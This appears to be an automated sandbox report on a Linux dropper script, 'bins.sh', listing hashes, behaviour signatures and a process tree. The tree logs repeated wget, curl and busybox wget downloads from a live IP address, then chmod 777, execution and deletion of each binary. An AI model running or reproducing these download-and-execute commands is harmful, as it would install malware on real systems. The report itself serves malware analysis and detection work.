Analysis
- max time kernel: 111s
- max time network: 141s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 04-11-2024 04:02
- Static task: static1
- Behavioral task behavioral1: Sample bins.sh, Resource ubuntu1804-amd64-20240611-en
- Behavioral task behavioral2: Sample bins.sh, Resource debian9-armhf-20240729-en
- Behavioral task behavioral3: Sample bins.sh, Resource debian9-mipsbe-20240611-en
- Behavioral task behavioral4: Sample bins.sh, Resource debian9-mipsel-20240611-en
General
- Target: bins.sh
- Size: 10KB
- MD5: 3974491d00b9582e0258135c610a9421
- SHA1: ecc37a0827534c2c0481e0612cd6df3fc19cf86e
- SHA256: 6bfa6f703269861e72d2adaf8105b6e76da66084c6242ca779b0a88fba559328
- SHA512: 7ede6a7178e143e32559bf9d3d51f2a6ab740c5e865bac2d7a173aef231ba0856edd270e2d8cada9440d33606071b1b89fda997c11b31fe7121618274641b57a
- SSDEEP: 192:hZC8+oCsQQl95VnaK4St9bi6I7HDvb5k8h74i6I7H/0vb5k8EC8+oCsQQHZ5VnaZ:hZhVrQQlSSnCvb5k8h790vb5k8EhVrQZ
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 28 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (pid, process): 752 chmod, 945 chmod, 897 chmod, 745 chmod, 859 chmod, 879 chmod, 933 chmod, 939 chmod, 885 chmod, 927 chmod, 951 chmod, 969 chmod, 981 chmod, 987 chmod, 891 chmod, 915 chmod, 975 chmod, 825 chmod, 831 chmod, 957 chmod, 903 chmod, 758 chmod, 778 chmod, 816 chmod, 909 chmod, 921 chmod, 873 chmod, 963 chmod
- Executes dropped EXE (28 IoCs)
  Processes (pid, path; the process name is the file's basename):
  746 /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE
  753 /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd
  759 /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi
  779 /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA
  817 /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB
  826 /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU
  832 /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1
  860 /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz
  874 /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5
  880 /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R
  886 /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj
  892 /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20
  898 /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll
  904 /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R
  910 /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj
  916 /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5
  922 /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R
  928 /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R
  934 /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20
  940 /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll
  946 /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB
  952 /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE
  958 /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd
  964 /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi
  970 /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA
  976 /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz
  982 /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU
  988 /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1
- Reads runtime system information (28 IoCs)
  Processes (description, ioc, process): 28 identical entries, each "File opened for reading /proc/sys/crypto/fips_enabled" by curl.
- System Network Configuration Discovery (1 TTPs, 10 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Processes (pid, process): 895 curl, 896 busybox, 898 13LziPPOU64KElhsy06VSGNerH5jNdigll, 936 wget, 937 curl, 894 wget, 899 rm, 938 busybox, 940 13LziPPOU64KElhsy06VSGNerH5jNdigll, 941 rm
- Writes file to tmp directory (30 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (ioc, process), each "File opened for modification":
  /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz curl
  /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R curl
  /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd curl
  /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA curl
  /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA curl
  /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB curl
  /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 curl
  /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R curl
  /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 curl
  /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R curl
  /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll curl
  /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi curl
  /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz curl
  /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd curl
  /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 curl
  /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R curl
  /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB curl
  /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE curl
  /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 curl
  /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj curl
  /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 curl
  /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU curl
  /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll curl
  /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj curl
  /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi curl
  /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 curl
  /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB wget
  /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB busybox
  /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU curl
  /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE curl
Processes (process path: command line, PID, signatures triggered; indentation shows tree depth)
- /tmp/bins.sh: /tmp/bins.sh (PID 711)
  - /bin/rm: /bin/rm bins.sh (PID 719)
  - /usr/bin/wget: wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 720)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 727) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 741)
  - /bin/chmod: chmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 745) [File and Directory Permissions Modification]
  - /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE: ./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 746) [Executes dropped EXE]
  - /bin/rm: rm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 747)
  - /usr/bin/wget: wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 749)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 750) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 751)
  - /bin/chmod: chmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 752) [File and Directory Permissions Modification]
  - /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd: ./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 753) [Executes dropped EXE]
  - /bin/rm: rm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 754)
  - /usr/bin/wget: wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 755)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 756) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 757)
  - /bin/chmod: chmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 758) [File and Directory Permissions Modification]
  - /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi: ./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 759) [Executes dropped EXE]
  - /bin/rm: rm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 760)
  - /usr/bin/wget: wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 761)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 763) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 773)
  - /bin/chmod: chmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 778) [File and Directory Permissions Modification]
  - /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA: ./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 779) [Executes dropped EXE]
  - /bin/rm: rm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 782)
  - /usr/bin/wget: wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 783) [Writes file to tmp directory]
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 792) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 807) [Writes file to tmp directory]
  - /bin/chmod: chmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 816) [File and Directory Permissions Modification]
  - /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB: ./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 817) [Executes dropped EXE]
  - /bin/rm: rm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 820)
  - /usr/bin/wget: wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 821)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 823) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 824)
  - /bin/chmod: chmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 825) [File and Directory Permissions Modification]
  - /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU: ./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 826) [Executes dropped EXE]
  - /bin/rm: rm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 827)
  - /usr/bin/wget: wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 828)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 829) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 830)
  - /bin/chmod: chmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 831) [File and Directory Permissions Modification]
  - /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1: ./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 832) [Executes dropped EXE]
  - /bin/rm: rm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 835)
  - /usr/bin/wget: wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 837)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 843) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 854)
  - /bin/chmod: chmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 859) [File and Directory Permissions Modification]
  - /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz: ./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 860) [Executes dropped EXE]
  - /bin/rm: rm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 864)
  - /usr/bin/wget: wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 865)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 871) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 872)
  - /bin/chmod: chmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 873) [File and Directory Permissions Modification]
  - /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5: ./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 874) [Executes dropped EXE]
  - /bin/rm: rm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 875)
  - /usr/bin/wget: wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 876)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 877) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 878)
  - /bin/chmod: chmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 879) [File and Directory Permissions Modification]
  - /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R: ./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 880) [Executes dropped EXE]
  - /bin/rm: rm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 881)
  - /usr/bin/wget: wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 882)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 883) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 884)
  - /bin/chmod: chmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 885) [File and Directory Permissions Modification]
  - /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj: ./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 886) [Executes dropped EXE]
  - /bin/rm: rm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 887)
  - /usr/bin/wget: wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 888)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 889) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 890)
  - /bin/chmod: chmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 891) [File and Directory Permissions Modification]
  - /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20: ./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 892) [Executes dropped EXE]
  - /bin/rm: rm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 893)
  - /usr/bin/wget: wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 894) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 895) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 896) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 897) [File and Directory Permissions Modification]
  - /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll: ./13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 898) [Executes dropped EXE; System Network Configuration Discovery]
  - /bin/rm: rm 13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 899) [System Network Configuration Discovery]
  - /usr/bin/wget: wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 900)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 901) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 902)
  - /bin/chmod: chmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 903) [File and Directory Permissions Modification]
  - /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R: ./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 904) [Executes dropped EXE]
  - /bin/rm: rm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 905)
  - /usr/bin/wget: wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 906)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 907) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 908)
  - /bin/chmod: chmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 909) [File and Directory Permissions Modification]
  - /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj: ./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 910) [Executes dropped EXE]
  - /bin/rm: rm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj (PID 911)
  - /usr/bin/wget: wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 912)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 913) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 914)
  - /bin/chmod: chmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 915) [File and Directory Permissions Modification]
  - /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5: ./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 916) [Executes dropped EXE]
  - /bin/rm: rm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 (PID 917)
  - /usr/bin/wget: wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 918)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 919) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 920)
  - /bin/chmod: chmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 921) [File and Directory Permissions Modification]
  - /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R: ./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 922) [Executes dropped EXE]
  - /bin/rm: rm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R (PID 923)
  - /usr/bin/wget: wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 924)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 925) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 926)
  - /bin/chmod: chmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 927) [File and Directory Permissions Modification]
  - /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R: ./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 928) [Executes dropped EXE]
  - /bin/rm: rm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R (PID 929)
  - /usr/bin/wget: wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 930)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 931) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 932)
  - /bin/chmod: chmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 933) [File and Directory Permissions Modification]
  - /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20: ./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 934) [Executes dropped EXE]
  - /bin/rm: rm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 (PID 935)
  - /usr/bin/wget: wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 936) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 937) [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 938) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 939) [File and Directory Permissions Modification]
  - /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll: ./13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 940) [Executes dropped EXE; System Network Configuration Discovery]
  - /bin/rm: rm 13LziPPOU64KElhsy06VSGNerH5jNdigll (PID 941) [System Network Configuration Discovery]
  - /usr/bin/wget: wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 942)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 943) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 944)
  - /bin/chmod: chmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 945) [File and Directory Permissions Modification]
  - /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB: ./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 946) [Executes dropped EXE]
  - /bin/rm: rm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB (PID 947)
  - /usr/bin/wget: wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 948)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 949) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 950)
  - /bin/chmod: chmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 951) [File and Directory Permissions Modification]
  - /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE: ./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 952) [Executes dropped EXE]
  - /bin/rm: rm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE (PID 953)
  - /usr/bin/wget: wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 954)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 955) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 956)
  - /bin/chmod: chmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 957) [File and Directory Permissions Modification]
  - /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd: ./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 958) [Executes dropped EXE]
  - /bin/rm: rm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd (PID 959)
  - /usr/bin/wget: wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 960)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 961) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 962)
  - /bin/chmod: chmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 963) [File and Directory Permissions Modification]
  - /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi: ./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 964) [Executes dropped EXE]
  - /bin/rm: rm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi (PID 965)
  - /usr/bin/wget: wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 966)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 967) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 968)
  - /bin/chmod: chmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 969) [File and Directory Permissions Modification]
  - /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA: ./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 970) [Executes dropped EXE]
  - /bin/rm: rm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA (PID 971)
  - /usr/bin/wget: wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 972)
